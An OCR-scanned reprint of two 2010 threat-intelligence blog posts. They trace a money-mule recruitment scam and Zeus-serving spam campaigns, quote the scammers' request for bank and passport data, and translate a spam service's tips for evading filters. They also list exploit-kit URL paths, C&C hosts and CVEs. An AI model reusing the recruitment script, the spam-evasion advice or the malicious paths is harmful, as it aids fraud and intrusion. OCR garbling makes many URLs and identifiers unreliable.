Requirements to Candidates: 

- 20 years old and more 
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- Be able to check your email several times a day 

- Should have personal (or business) bank account 

- Have a skill to communicate and access to the Internet. 

- Foreign language (English is preferable). 

- To have an opportunity in any working hours to go to 
closest Western Union location and make money transfer. 


What we offer: 


- Generous wages - (Your earnings will originally make 5 % 
from each payment. Your earnings will originally make 5 % 

from each payment. After 5 remittances if you will 
operatively work and correctly, your earnings raises up to 10 
%.) 

- Opportunity of increase in your earnings. 

- Free seminars and training courses (After 6 months of great 
work). 

2010 © Cefin Consulting & Finanacelf you are interested in 
this opening, don't hesitate to send your CV at our e-mail: 

cefincfss@yahoo.com AH right reserved. " 

Response received from cefincfss@yahoo.com with IP 
[1]91.207.4.162, asking for the following details, althrough 

the [2]DIY money-mule recruitment management 
interface automates the entire process, thereby allowing it 
to scale: 

" if you have understood the meaning of work and ready to 
begin working with us, please send us your INFO in the 
following format: 
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1) First name; 2) Last name; 3) Country; 4) City; 5) Zip code; 
6) Home Phone number, Work Phone number, 

Mobile Phone number; 7) Bank account info:; a) Bank name; 
b) Account name; c) Account number; d) Sort code; 8) Scan 
you passport or driver license" 


The CV forwarding email provided is 
mynesco@yahoo.com, although they'll even recruit you 
without sending 

them the required CV. 

What's special about the bogus company, is not the new 
template layout that they've purchased from a [3]vendor 
offering creative for money-mule recruitment 
campaign, but their attempt to establish themselves as a 
trusted brand by featuring fake certificates issued by easily 
recognizable brands, such as Western Union, Money 
Gram, Investors in People, the World Business 
Community and even an award from the Chamber Awards 
for 2004 in the category -" Most Promising New Business". 

Moreover, parked on the very same IP where the 
money mule recruitment is, are also domains 
currently serving 

live exploits, as well as a DIY interface for a 
spamming service known as "OS-CORP". 

The certificates in question: 
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Cefin Consulting & Finance describes itself as: 

11 Cefin consulting & Finance was founded at the beginning of 
1990. The emerged structure united specialists with unique 
background in management consulting, marketing research, 
business evaluation and stock-exchange 

operations. The following two companies constitute Cefin 
consulting & Finance: 

- Omega Financial Dept. - the dedicated company in the field 
of securities operations; 

- Omega Consult - the dedicated consulting company, 
rendering services in strategic planning and corporate 
management. 

Activity of Cefin consulting & Finance is focused on 
generation of balanced solutions for active development of 
the company and minimization of business risks. 
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Cefin consulting & Finance offers successful managerial 
solutions through consulting support to projects in various 
spheres, namely: comprehensive restructuring and 
organizational development, generation of managing 
companies, engineering of tailored management systems for 
corporate clients, implementation of project management 
methods, business development financial and economic 
simulation. 


Top-notch dedicated professionals with key competence in 
various consulting fields constitute our rigorous staff. 

We boast to have management consulting and business 
strategy development experts, certified securities dealers, 
assessment and registration, marketing and financial 
specialists, corporate law and anti-monopoly legislation 
gurus. 

Address: Cefin consulting & Finance is located at 510 East 
80th Street, New York, New York 10021 , United States 786- 
475-3994; 786-475-3994 (FAX)" 
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The money mule recruitment domain cefincf .com - 
195.190.13.106 - Email: flier@infotorrent.ru remains active. 

Parked on the same IP are also the following domains, 
currently hosting live exploit kits: 

384756783900 .cn - Email: abuse@domainsreg.cn 

109438129432 .cn - Email: abuse@domainsreg.cn 

234273849543 .cn - Email: abuse@domainsreg.cn 

783456788839 .cn - Email: abuse@domainsreg.cn 

odnaklasniki .cn - Email: Michell.Gregory2009@yahoo.com 
- Email profiled in December 2009's M [4] Celebrity- 

Themed Scareware Campaign Abusing DocStoc" - 

money mule recruitment connection 

mynes-consultings .cn - Email: grishanizov@gmail.com 


mynes-consult .cn - Email: grishanizov@gmail.com 
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Sample live exploit structure, currently active at these 
domains: 

- mynes-consult .cn -> if exploitation is not possible, the 
user is redirected to the legitimate newegg.com 

- mynes-consult ,cn/load.php?spl = mdac 

- mynes-consult .cn/load.php?spl = buddy 

- mynes-consult .cn/load.php?spl = myspace 

- mynes-consult .cn/load.php?spl=vml2 

- mynes-consult .cn/load.php?spl=ymj 

- mynes-consult .cn/load.php?spl=zangol 

- mynes-consult .cn/load.php?spl=zango2 

All of these exploits drop load.exe - 

[5]TrojanDownloader:Win32/Cutwail.gen!C - Result: 
41/41 (100.00 %), 

which upon execution phones back to 69.162.86.210, 

With cybercriminals actively multi-tasking these days, this 
money mule recruitment gang doesn't make an ex¬ 
ception. On one of the domains listed above, a low-profile DIY 
spamming service known as OS-CORP is offering its 


services. 
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The DIY spam service, also has Terms of Service and offers 
basic spamming recommendations. The following is a 

roughly translated version of them: 

" - No child Porno spamming! 

- Do not offer me affiliate program ( % of sales), I do not 
care! 

- ICQ almost always online, but this does not mean that I 
always present! If you have not received an answer 

immediately have patience, I will answer as soon as 
appearing! 

- Mailing lists on bases of certain subjects are more 
expensive! 

-1 am not responsible for your campaigns and sites sites that 
are sometimes nailed in the process of spam! Use anti-abuse 
hosting! 

- I'm not offering anti-abuse hosting services! 

-1 don't offer recommendations for such services. I give only 
the services that spam! 

- Campaign's size should be UP TO 50 kb! 
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Recommendations for the preparation of material for 
delivery! 

- Do not always send the same text messages, ideally, to 
change the text after each mailing, the effect of there! 

- Do not use themes in writing (headers) words such as 
EARN, OFFER, do not put a lot of exclamation marks and 
other (better do without them), just one! 

- For a good response from countries whose native language 
is not English (eg Sweden, Spain, Denmark, etc.) is highly 
desirable to use the native language of the text distributed 
to countries, it gives a wonderful effect, and should not be 
mistaken, in countries such not everyone knows English, 
verified repeatedly! 

- Do not write too long texts on a number of reasons this 
does not give a positive effect, but not limited to one 
sentence worth! Ideally, make the text in a few not 
particularly bulky paragraphs !" 

The deeper your analyze, the more malicious, and most 
importantly, inter-connected it gets. 

Related coverage of money laundering in the context 
of cybercrime: 

[6] Keeping Money Mule Recruiters on a Short Leash - Part Two 
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[7] Keeping Reshipping Mule Recruiters on a Short Leash 

[8] Keeping Money Mule Recruiters on a Short Leash 

[9] Standardizing the Money Mule Recruitment Process 



[10] Money Mule Recruiters use ASProx's Fast Fluxing 
Services 

[11] Money Mules Syndicate Actively Recruiting Since 2002 

[ 12]Inside a Money Laundering Group's Spamming 
Operations 

This post has been reproduced from [13]Dancho Danchev's 
blog. Follow him [14]on Twitter. 

1. http://www.pro i ecthone v pot.Or g/i p_91.207.4.162? 
Vid=4lo20a29dlh0pnf8k2kpbina l2 

2. http://ddanchev.blo as pot.com/20Q9/10/standardizin a- 
monev-mule-recruitment.html 

3. http://ddanchev.blo as pot.com/20Q9/10/standardizin a- 
monev-mule-recruitment.html 

4. http://ddanchev.blo as pot.com/20Q9/12/celebritv-themed- 
scareware-camoai a n 07.html 

5. 

http://www.virustotal.com/analisis/lddfcb68894a31cael3fcb 

0 6227 9 0 1c e 8 7 d 344 9 a44 2 c 6 d e S 3 b4 6 6 e0 91d1c a 5 e 7 -12 6 6 0 

06095 

6. http://ddanchev.blo as pot.com/2010/Q2/keepin a -mone v- 
mule-recruiters-on-short.html 

7. http://ddanchev.blo as pot.com/20Q9/12/keepin a- 
reshi p pin a -mule-recruiters-on.html 

8. http://ddanchev.blo as pot.com/20Q9/ll/keepin a -mone v- 
mule-recruiters-on-short.html 





































9. http://ddanchev.blo as oot.com/2009/10/standardizin a- 
monev-mule-recruitment.html 


10. http://ddanchev.blo as pot.com/2008/Q7/monev-mule- 
recruiters-use-asproxs-fast.html 

11. http://ddanchev.blo as pot.com/20Q8/10/monev-mules- 
s vndicate-activelv.html 

12. http://ddanchev.blo as pot.com/2009/05/inside-mone v- 
launderin a-a rouos-spammin a .html 

13. http://ddanchev.blo as oot.com/ 

14. http://twitter.com/danchodanchev 
159 




IRS/PhotoArchive Themed Zeus/Client-Side Exploits 
Serving Campaign in the Wild (2010-02-15 23:34) 

UPDATED: Monday, February 22, 2010 - Another 
typosquatted domains portfolio is being spamvertised, 
including two new name servers, parked on the same IP 
where name servers from previous campaigns were hosted. 
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Typosquatted domains, and name servers of notice are as 
follows: 

dese.co.kr - Email: asondrapgt@hotmail.com 
dese.kr - Email: asondrapgt@hotmail.com 

























dese.ne.kr - Email: asondrapgt@hotmail.com 
dese.or.kr - Email: asondrapgt@hotmail.com 
desr.co.kr - Email: asondrapgt@hotmail.com 
desr.kr - Email: asondrapgt@hotmail.com 
desr.or.kr - Email: asondrapgt@hotmail.com 
desv.co.kr - Email: asondrapgt@hotmail.com 
desv.kr - Email: asondrapgt@hotmail.com 
desv.ne.kr - Email: asondrapgt@hotmail.com 
desv.or.kr - Email: asondrapgt@hotmail.com 
desx.co.kr - Email: asondrapgt@hotmail.com 
desx.kr - Email: asondrapgt@hotmail.com 
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desx.ne.kr - Email: asondrapgt@hotmail.com 
desx.or.kr - Email: asondrapgt@hotmail.com 

edasa.co.kr 

edasa.kr 

edasa.ne.kr 

edasa.or.kr 

edase.co.kr 


edase.kr 



edase.ne.kr 


edase.or.kr 

edasn.kr 

edasn.ne.kr 

edasn.or.kr 

edasq.co.kr 

edasq.kr 

edasq.ne.kr 

edasq.or.kr 

Name servers of notice: 

nsl.silverbrend.net - 87.117.245.9 - Email: 
klincz@aol.com 

nsl.hourscanine.com - 87.117.245.9 - Email: 
carruawau@gmail.com 

UPDATED: Sunday, February 21, 2010 - The gang is 
currently spamming a phishing campaign - no client-side 

serving iFrames found so far - attempting to steal Google 
account and Blogspot accounting data. Given the fact that 
the gang is capable of generating hundreds of thousands of 
bogus accounts on their own, as well as buy them in bulk 
orders from vendors that have already built such an 
inventory across multiple social networking sites, the only 
logical reason for attempting to phish for such data would be 
to attempt to maliciously monetize the traffic of legitimate 
blogs. 
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The newly spamvertised domains, including a new name 
server are as follows: 

esub.co.kr - Email: osamplerl61@hotmail.com 
esub.kr - Email: osamplerl61@hotmail.com 
esub.ne.kr - Email: osamplerl61@hotmail.com 
esug.co.kr - Email: osamplerl61@hotmail.com 
esug.kr - Email: osamplerl61@hotmail.com 
esug.ne.kr - Email: osamplerl61@hotmail.com 
esuk.kr - Email: osamplerl61@hotmail.com 
esuk.ne.kr - Email: osamplerl61@hotmail.com 
esuk.or.kr - Email: osamplerl61@hotmail.com 
esus.co.kr - Email: osamplerl61@hotmail.com 
esus.kr - Email: osamplerl61@hotmail.com 

esus. ne.kr - Email: osamplerl61@hotmail.com 

esut. co.kr - Email: osamplerl61@hotmail.com 

esut.kr - Email: osamplerl61@hotmail.com 

esut.ne.kr - Email: osamplerl61@hotmail.com 

nsl.nitroexcel.com - 89.238.165.195 (the same IP was 
also hosting the name server domains from previous 


campaigns) - Email: rackmodule@writemail.com 

UPDATED: Saturday, February 20, 2010 - The client-side 
exploit serving iFrame directory has been changed to 
91.201.196.101 /usaspll/in.php, with another 
typosquatted portfolio of domains currently being 
spamvertised. 
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Detection rates: update.exe - [l]Trojan.Zbot - Result: 25/40 
(62.5 %) (phones back to trollar.ru /cnf/trl.jpg - 

109.95.114.133 - Email: bernardo_pr@inbox.ru); file.exe - 

[2] Trojan.Spy.ZBot.l2544.1 - Result: 26/41 (63.42 %); ie.js - 

[3] JS:CVE-2008-0015-G - Result: 14/40 (35 %); ie2.js - 

[4] Exploit:JS/CVE-2008-0015 - Result: 17/40 (42.5 %); 
nowTrue.swf - [5]Trojan.SWF.Dropper.E - Result: 24/41 
(58.54 %); pdf.pdf - [6jExploit.JS.Pdfka.bin - Result: 11/41 

(26.83 %); swf.swf - [7]SWF/Exploit.Agent.BS - Result: 8/40 
(20 %). 

Domain portfolio, name server of notice - 
nsl.vektoroils.net - 74.117.63.218 - Email: 
admin@forsyte.info : desa.co.kr - Email: 
hjfeasey@yahoo.co.uk 

desa.kr - Email: hjfeasey@yahoo.co.uk 

desa.ne.kr - Email: hjfeasey@yahoo.co.uk 

desa. or.kr - Email: hjfeasey@yahoo.co.uk 

desb. co.kr - Email: hjfeasey@yahoo.co.uk 


desb.kr - Email: hjfeasey@yahoo.co.uk 
desb.ne.kr - Email: hjfeasey@yahoo.co.uk 
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desb.or.kr - Email: hjfeasey@yahoo.co.uk 

deso.kr - Email: hjfeasey@yahoo.co.uk 

deso.or.kr - Email: hjfeasey@yahoo.co.uk 

desv.kr - Email: hjfeasey@yahoo.co.uk 

desz.co.kr - Email: hjfeasey@yahoo.co.uk 

desz.kr - Email: hjfeasey@yahoo.co.uk 

desz.ne.kr - Email: hjfeasey@yahoo.co.uk 

desz.or.kr - Email: hjfeasey@yahoo.co.uk 

UPDATED: Wednesday, February 17, 2010 - The iFrame 
directory has been changed to 91.201.196.101 /us- 

asp/in.php, detection rate for update.exe - [8]Trojan- 
Spy.Win32.Zbot.gen - Result: 17/40 (42.5 %). 
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Currently active and spamvertised domains include: 
saqwk.co.kr - Email: Camerc05@yahoo.com 
saqwk.kr - Email: Camerc05@yahoo.com 
saqwk.ne.kr - Email: Camerc05@yahoo.com 


saqwk.or.kr - Email: Camerc05@yahoo.com 

saqwm.co.kr - Email: Camerc05@yahoo.com 

saqwm.kr - Email: Camerc05@yahoo.com 

saqwm.ne.kr - Email: Camerc05@yahoo.com 

saqwq.co.kr - Email: Camerc05@yahoo.com 

saqwq.kr - Email: Camerc05@yahoo.com 

saqwq.ne.kr - Email: Camerc05@yahoo.com 

saqwq.or.kr - Email: Camerc05@yahoo.com 

saqwz.co.kr - Email: Camerc05@yahoo.com 

saqwz.kr - Email: Camerc05@yahoo.com 

saqwz.ne.kr - Email: Camerc05@yahoo.com 

saqwz.or.kr - Email: Camerc05@yahoo.com 

As anticipated, the botnet masters behind the systematically 
rotated campaigns dissected in previous posts, 

kick off the week with multiple campaigns parked on the 
newly introduced fast-fluxed domains. 
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In a typical multitasking fashion, two campaigns are 
currently active on different sub domains introduced at the 

typosquatted fast-flux ones, impersonating the U.S IRS with " 
Unreported/Underreported Income (Fraud Application) 


theme", as well as a variation of the [9]already profiled 
PhotoArchive campaign, using a well known "[10] You don't 
have the latest version of Macromedia Flash Player*' error 
message. 
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Let's dissect both campaigns, sharing the same fast-flux 
infrastructure, and currently spammed in the wild. 

Sample campaign URLs from the PhotoArchive, 
SecretArchives themed campaign: 

- archive .repok.or.kr/archive0714/?id=test@test.com 

- secretarchives .renyn.kr/archive0714/? 
id=test@test.com 

- secretfiles .repolit.me.uk/archive0714/? 
id=test@test.com 

- secretarchives .renyn.ne.kr/archive0714/? 
id=test@test.com 

- postcards .repolix.co.uk/archive0714/? 
id=test@test.com 

Sample sub domain structure: 

anonymousfiles .repoli2.me.uk 
archive .repoliq.me.uk 
archive .repolit.me.uk 
archives .repolil.me.uk 


filearchive .repolil.me.uk 
files .repolit.me.uk 
files .repolix.me.uk 
files4friends .repolit.me.uk 
secretarchives .repoliq.me.uk 
secretarchives .repoliw.me.uk 
secretarchives .repolix.me.uk 
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secretfiles .repoliq.me.uk 
sendspace .repoli2.me.uk 
archive .repolix.co.uk 
archives .repoliq.co.uk 
archives .repolix.co.uk 
files .repoliq.co.uk 
files4friends .repolix.co.uk 
incognito .repoliq.co.uk 
postcard .repoliq.co.uk 
postcard .repoliw.co.uk 
secretarchives .repoliw.co.uk 
www.irs.gov.repolix.co.uk 



Embedded iFrame - 91.201.196.101 /ukasp/in.php 

(AS42229 (MARIAM-AS PP Mariam) attempts to exploit 

[ll]CVE-2007-5659; [12]CVE-2008-2992; [13JCVE-2008- 
0015; [14]CVE-2009-0927 and [15]CVE-2009-4324. Upon 

successful exploitation, file.exe - [16]Trojan- 
Spy.Win32.Zbot.gen - Result: 12/41 (29.27 %) is served. Just 
like the original update.exe - [17]Trojan.Zbot - Result: 

13/40 (32.50 %) available as a manual download from the 
pages, both 

[18]samples phone back to the well known elnasa.ru 
/asd/elnasa.ble - 109.95.114.71 - Email: kievsk@yandex.ru 


[19]Aleksey V Kijanskiy. 

Naturally, [20JAS42229 (MARIAM-AS PP Mariam) is a 
cybercrime-friendly AS, with the following currently ac¬ 
tive Zeus C &Cs parked there: 

91.201.196.35 

91.201.196.75 

91.201.196.76 
91.201.196.38 
91.201.196.34 


91.201.196.37 

Sample URL from the IRS-themed campaign: 



- irs.gov 

.renyn.kr/fraud.applications/application/statement.ph 

P 

Sample iFrame from the IRS-themed campaign - 

109.95.114.251 /usa50/in.php is currently down. The 
same 

IP was used to serve client-side exploits in a previous 
campaign - "[21] Pushdo Serving Crimeware, Client-Side 
Exploits and Russian Bride Scams ". 

Detection ratefortax-statement.exe - [22]Trojan- 
Spy.Win32.Zbot.gen - Result: 37/41 (90.25 %), [23]which 
upon execution phones [24]back to the well known 
nekovo.ru /cbd/ nekovo.br - 109.95.115.18 - Email: 
kievsk@yandex.ru 

- Aleksey V Kijanskiy 
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Active and spamvertised fast-fluxed domains part of the 
campaign: 

renya.co.kr - Email: Sethdc77@yahoo.co.uk 
renya.kr - Email: Sethdc77@yahoo.co.uk 
renya.ne.kr - Email: Sethdc77@yahoo.co.uk 
renya.or.kr - Email: Sethdc77@yahoo.co.uk 
renyn.kr - Email: Sethdc77@yahoo.co.uk 
renyn.ne.kr - Email: Sethdc77@yahoo.co.uk 


renyn.or.kr - Email: Sethdc77@yahoo.co.uk 
renyo.co.kr - Email: Sethdc77@yahoo.co.uk 
renyo.kr - Email: Sethdc77@yahoo.co.uk 
renyo.ne.kr - Email: Sethdc77@yahoo.co.uk 
renyo.or.kr - Email: Sethdc77@yahoo.co.uk 
renyx.co.kr - Email: Sethdc77@yahoo.co.uk 
renyx.kr - Email: Sethdc77@yahoo.co.uk 
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renyx.ne.kr - Email: Sethdc77@yahoo.co.uk 
renyx.or.kr - Email: Sethdc77@yahoo.co.uk 
rep021.co.kr - Email: DRendell3407@hotmail.com 
rep021.kr - Email: DRendell3407@hotmail.com 
rep021.ne.kr - Email: DRendell3407@hotmail.com 
rep021.or.kr - Email: DRendell3407@hotmail.com 
rep022.co.kr - Email: DRendell3407@hotmail.com 
rep022.kr - Email: DRendell3407@hotmail.com 
rep022.ne.kr - Email: DRendell3407@hotmail.com 
rep022.or.kr - Email: DRendell3407@hotmail.com 
rep023.co.kr - Email: DRendell3407@hotmail.com 
rep023.kr - Email: DRendell3407@hotmail.com 



rep023.or.kr - Email: DRendell3407@hotmail.com 
rep024.kr - Email: DRendell3407@hotmail.com 
rep071.co.kr - Email: KantuM37690@hotmail.com 
rep071.kr - Email: KantuM37690@hotmail.com 
rep071.ne.kr - Email: KantuM37690@hotmail.com 
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rep071.or.kr - Email: KantuM37690@hotmail.com 
rep072.co.kr - Email: KantuM37690@hotmail.com 
rep072.kr - Email: KantuM37690@hotmail.com 
rep072.ne.kr - Email: KantuM37690@hotmail.com 
rep072.or.kr - Email: KantuM37690@hotmail.com 
rep073.co.kr - Email: KantuM37690@hotmail.com 
rep073.kr - Email: KantuM37690@hotmail.com 
rep073.ne.kr - Email: KantuM37690@hotmail.com 
rep073.or.kr - Email: KantuM37690@hotmail.com 
rep074.co.kr - Email: KantuM37690@hotmail.com 
rep074.ne.kr - Email: KantuM37690@hotmail.com 
rep074.or.kr - Email: KantuM37690@hotmail.com 
repl051.co.uk 


repl051.me.uk 

repl051.org.uk 

repl051.uk.com 

repak.co.kr - Email: limhomeslm@yahoo.co.uk 
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repak.kr - Email: limhomeslm@yahoo.co.uk 
repak.ne.kr - Email: limhomeslm@yahoo.co.uk 
repak.or.kr - Email: limhomeslm@yahoo.co.uk 
repaz.co.kr - Email: Olb55768@yahoo.co.uk 
repaz.kr - Email: Olb55768@yahoo.co.uk 
repaz.or.kr - Email: Olb55768@yahoo.co.uk 
repek.co.kr - Email: limhomeslm@yahoo.co.uk 
repek.ne.kr - Email: limhomeslm@yahoo.co.uk 
repek.or.kr - Email: limhomeslm@yahoo.co.uk 
repey.co.kr - Email: Olb55768@yahoo.co.uk 
repey.kr - Email: Olb55768@yahoo.co.uk 
repey.ne.kr - Email: Olb55768@yahoo.co.uk 
repey.or.kr - Email: Olb55768@yahoo.co.uk 
repia.co.kr - Email: Olb55768@yahoo.co.uk 
repia.kr - Email: Olb55768@yahoo.co.uk 



repia.ne.kr - Email: Olb55768@yahoo.co.uk 
repia.or.kr - Email: Olb55768@yahoo.co.uk 
repik.co.kr - Email: limhomeslm@yahoo.co.uk 
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K 

repik.kr - Email: limhomeslm@yahoo.co.uk 
repik.or.kr - Email: limhomeslm@yahoo.co.uk 
repok.co.kr - Email: limhomeslm@yahoo.co.uk 
repok.kr - Email: limhomeslm@yahoo.co.uk 
repok.ne.kr - Email: limhomeslm@yahoo.co.uk 
repok.or.kr - Email: limhomeslm@yahoo.co.uk 
repoy.co.kr - Email: Olb55768@yahoo.co.uk 
repoy.kr - Email: Olb55768@yahoo.co.uk 
repoy.ne.kr - Email: Olb55768@yahoo.co.uk 
repoy.or.kr - Email: Olb55768@yahoo.co.uk 
repolil.co.uk 
repolil.me.uk 
repoli2.co.uk 
repoli2.me.uk 
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repoli3.co.uk 

repolie.co.uk 

repolio.co.uk 

repoliq.co.uk 

repoliq.me.uk 

repolit.me.uk 

repoliw.co.uk 

repoliw.me.uk 

repolix.co.uk 

repolix.me.uk 

Name servers of notice: 

nsl .skcrealestate.net - 89.238.165.195 - Email: 
support@skrealty.net 

nsl .addressway.net - 89.238.165.195 - Email: 
poolbill@hotmail.com 

nsl .skcpanel.com - 64.20.42.235 - Email: 
support@sk.com 

nsl .holdinglory.com - 64.20.42.235 - Email: 
greysy@gmx.com 

nsl .skcres.com - 64.20.42.235 - Email: hr@skc.net 

nsl .x-videocovers.net - 64.20.42.235 - Email: 
storylink@live.com 



Interestingly, researchers from [25]M86 Security gained 
access to the web malware exploitation kit used in a 

previous campaign: 

11 It has been up and running and serving exploits for nearly 
day. In this time almost 40,000 unique users 

have been exposed to these exploits, and the Zeus 
file has been downloaded over 5000 times. These 
downloads do not include the PhotoArchive.exe file 
downloads that a user may be tricked into downloading and 
executing 

themselves. " 

Updated will be posted as soon as new developments 
emerge. 

Related coverage of the gang's previous campaigns: 

[26] Tax Report Themed Zeus/Client-Side Exploits Serving 
Campaign in the Wild 

[27] PhotoArchive Crimeware/Client-Side Exploits Serving 
Campaign in the Wild 

[28] Facebook/AOL Update Tool Spam Campaign Serving 
Crimeware and Client-Side Exploits 

[29] Pushdo Serving Crimeware, Client-Side Exploits and 
Russian Bride Scams 

[30] Outlook Web Access Themed Spam Campaign Serves 
Zeus Crimeware 

[31] Pushdo Injecting Bogus Swine Flu Vaccine 



[32] "Your mailbox has been deactivated" Spam Campaign 
Serving Crimeware 

[33] Ongoing FDIC Spam Campaign Serves Zeus Crimeware 

[34] The Multitasking Fast-Flux Botnet that Wants to Bank 
With You 

This post has been reproduced from [35]Dancho Danchev's 
blog. Follow him [36]on Twitter. 

1. 

http://www.virustotal.com/analisis/efl20bf9f7791f0acefb05d 

4628d2c2d87999938fdb9f3152142436bc321ec05-12666 

91798 

2 . 

http://www.virustotal.com/analisis/ea81al21b75fe8ad2e445 

Cdl3a6350850de2bf21cdb6dldc4eac247b2aac3a40-12667 

08037 

3. 

http://www.virustotal.com/analisis/1983abeb8001365952fe0 

68i4ab6a676acebac0blcbf4f3d2030de424bQdel30-12G66 

91316 

4. 

http://www.virustotal.com/analisis/f4dl9dca77a571b73eaelf 

0c3640db81cc257472flcc9e3flca0376216df4a91-12666 

91333 
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5. 

http://www.vi rustotal.com/analisis/de54327ae5b208flf4570 

4d41ef03cQ2758f7fl2c2f63907db70429529c44df3-12666 

91345 

6 . 

http://www.virustotal.com/analisis/36e91b84b8e3f83a8044d 

3c375398d9840dce4fl2d8c312f417e98f696dc34eQ-12666 

91352 

7. 

http://www.virustotal.com/analisis/6a0295a38536274beca2a 

f613afbadabbdd29cbfb669942b02aec810d68ff019-12666 

91365 

8 . 

http://www.virustotal.com/analisis/7556adl6c7507777c21a7 

3ebcc5d5ff3661f5e44a98899fll7aa96bc3246flfd-12664 

25345 

9. http://ddanchev.blo as pot.com/2010/02/photoarchive- 
crimewareclient-side.html 


10. http://irs/PhotoArchive%20Themed%20Zeus/Client- 

Side%20Exploits%20Servin a %20Camoai a n%20in%20the%2 

OWild 
























11. http://cve.mitre.or g/ca i-bin/cvename.c a i?name=CVE- 
2007-5659 


12. htto://cve.mitre.or a/ca i-bin/cvename.c a i?name=2008- 
2992 

13. http://cve.mitre.or a/ca i-bin/cvename.c a i?name=2008- 
0015 

14. http://cve.mitre.or a/ca i-bin/cvename.c a i?name=CVE- 
2009-0927 

15. htto://cve.mitre.or a/ca i-bin/cvename.c a i?name=CVE- 
2009-4324 

16. 

http://www.virustotal.com/analisis/3cl393354cl40fc2a64cb68f 

e9fa51c575dablaf87065abbef811dd4d7e051db07-12662 

75738 

17. 

http://www.virustotal.com/analisis/3aaa85a66689a9c092431 

27b0831e7294b3dbl91ce0c3e81ebc871fe843506fc-12662 

68338 

18. http://ddanchev.blo as pot.com/2010/01/pushdo-servin g- 
crimeware-client-side.html 

19. http://ddanchev.blo as pot.com/2010/01/outlook-web- 
access-themed-soam-camoai a n.html 

20. https://zeustracker.abuse.ch/monitor. oh o?as=42229 

21. http://ddanchev.blo as pot.com/201Q/01/pushdo-servin a- 
crimeware-client-side.html 











































22 . 

http://www.vi rustotal.com/analisis/f72cf75417e21eecf8defal 

a52a9601c4eb4dbfd3961e782bdlc0aa0157ce8fc-12662 

68334 


23. http://ddanchev.blo as pot.com/2010/02/photoarchive- 
crimewareclient-side.html 


24. http://ddanchev.blo as pot.com/201Q/01/outlook-web- 
access-themed-spam-campai a n.html 

25. http://www.m86securitv.com/trace/traceitem.as p? 
article=1233 


26. http://ddanchev.blo as pot.com/2010/Q2/tax-report- 
themed-zeusclient-side.html 


27. http://ddanchev.blo as pot.com/2010/02/phQtoarchive- 
crimewareclient-side.html 


28. http://ddanchev.blo as pot.com/201Q/01/facebookaol- 
u pdate-tool-spam-campai a n.html 

29. http://ddanchev.blo as pot.com/2010/01/pushdo-servin a- 
crimeware-client-side.html 


30. http://ddanchev.blo as pot.com/201Q/01/outlook-web- 
access-themed-spam-campai a n.html 

31. http://ddanchev.blo as pot.com/2009/12/pushdo-in i ectin a- 
bo a us-swine-f1u.html 

32. http://ddanchev.blo as pot.com/20Q9/ll/vour-mailbox-has- 
been-deactivated-spam.html 


33. http://ddanchev.blo as pot.com/20Q9/10/on a oin a -fdic- 
s pam-campai a n-serves-zeus.html 























































34. http://ddanchev.blo as pot.com/2009/Q7/multitaskin a -fast- 
f1ux-botnet-that.html 


35. http://ddanchev.blo as oot.com/ 

36. http://twitter.com/danchodanchev 
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<htmi> • hr *<!• 

Mtp-e*Blv-"Cont*nt-Typ«" cant**it»"teKt/ht»I; charge-ISO-8859-1 "> 

<1 Ink rwl-"jitylwsh«wt" type--twxt/cs*" hr»f«*t hf «.cu *> 

<titl*>You don’t have the Intent version of Hacrowedia flash Player <Vt»«le> 

lfttn>nln-*Q* tepnarflw-Q*' mrqinheight »-C'" ■umnw><>N‘*0*> 


<kr> 

it able bord»r»"0" wld»h-“9M"> 

<l h> <yxtr> 

<td width-" 10"> 

-.um »rc-- apweeg .pit " boidrr- "O" heldit*”2S‘ *Ulh*“:0"> 

</td> 

<td f«llp*"lx)Ctar> 

vlwil sl**-“*l" taca^Verdana, Geneva,Ariel,Helvetica,seas>serif">You don't have the latest version of Haerowedia flash Player </fant> 

</td> 

</tr> 

<tr> 

<td class- "bc-dyt ext "> 

<p> 

<fesit f «ee-"Jii lal, Helvetica, sans-ser lf”>Thls site wakes use of Racrowediad flash(TN) software. You've installed an old version of Racrowedla flash 
</9> 

'- 9 > 

<Ua« arc-* flash get.gif herder- "0" Midit-' l" wldth-"r)i5"></s></p> 

IRS/PhotoArchive Themed Zeus/Client-Side Exploits 
Serving Campaign in the Wild (2010-02-15 23:34) 

SECOND UPDATE for Wednesday, February 24, 2010 - 

Another portfolio of new domains is being spamvertised, 
using the old PhotoArchive theme. The client-side exploits 
serving iFrame directory has been changed to 

91.201.196.101 

/usasp33/in.php currently serving CVE-2007-5659; CVE- 
2008-2992; CVE-2008-0015; CVE-2009-0927 and CVE-2009- 

4324. 

Sample detection rates: update.exe - [l]Trojan- 
Spy.Win32.Zbot.gen - Result: 10/42 (23.81 %); file.exe - 
[2]TrojanSpy.Win32.Zbot.gen - Result: 10/42 (23.81 %). 
Samples phone back to the same C &C where samples from 
















previous campaigns were also phoning back to - trollar.ru 
/cnf/trl.jpg - 109.95.114.133 - Email: bernardo 
_pr@inbox.ru. 

Domains portfolio: 

reda. kr - Email: ClarenceN62412@hotmail.com 

redb. kr - Email: ClarenceN62412@hotmail.com 

reda. ne.kr - Email: ClarenceN62412@hotmail.com 

redb. ne.kr - Email: ClarenceN62412@hotmail.com 
redn.ne.kr - Email: ClarenceN62412@hotmail.com 
redv.ne.kr - Email: ClarenceN62412@hotmail.com 
redn.kr - Email: ClarenceN62412@hotmail.com 
reda.co.kr - Email: ClarenceN62412@hotmail.com 
redv.co.kr - Email: ClarenceN62412@hotmail.com 

reda. or.kr - Email: ClarenceN62412@hotmail.com 

redb. or.kr - Email: ClarenceN62412@hotmail.com 
redn.or.kr - Email: ClarenceN62412@hotmail.com 
redv.or.kr - Email: ClarenceN62412@hotmail.com 
redv.kr - Email: ClarenceN62412@hotmail.com 
Name server of notice: 

nsl.skcstaffing.com - 87.117.245.9 - Email: 
hr@department.com 



UPDATED: Wednesday, February 24, 2010 - Another 
portfolio of typosquatted domains has been spamver- 

tised. The already suspended domains are listed for historical 
OSINT analysis of this gang's activities. 

Interestingly, their campaigns are lacking the quality 
assurance I'm used to see. For instance, the iFrame IP 

(109.95.114.251 /usa50/in.php) is currently down, with 
the malware itself, including the one that would have been 
dropped given the exploitation took place - have over 90 % 
detectio rate, since the binaries were first analyzed a 177 














month ago - tax-statement.exe - [3]Trojan-Spy.Win32.Zbot 

- 40/42 (95.24 %); abs.exe - [4]Packed:W32/Mufanom.A 

- Result: 38/42 (90.48 %). The directory structure also 
remains the same - irs.gov.yrxc.kr/fraud.applications 

/application/statement, php 

Domains portfolio, including name servers of notice are as 
follows: 

erdca.co.kr - Email: WeedDamel6427@hotmail.com 
erdca.kr - Email: WeedDamel6427@hotmail.com 
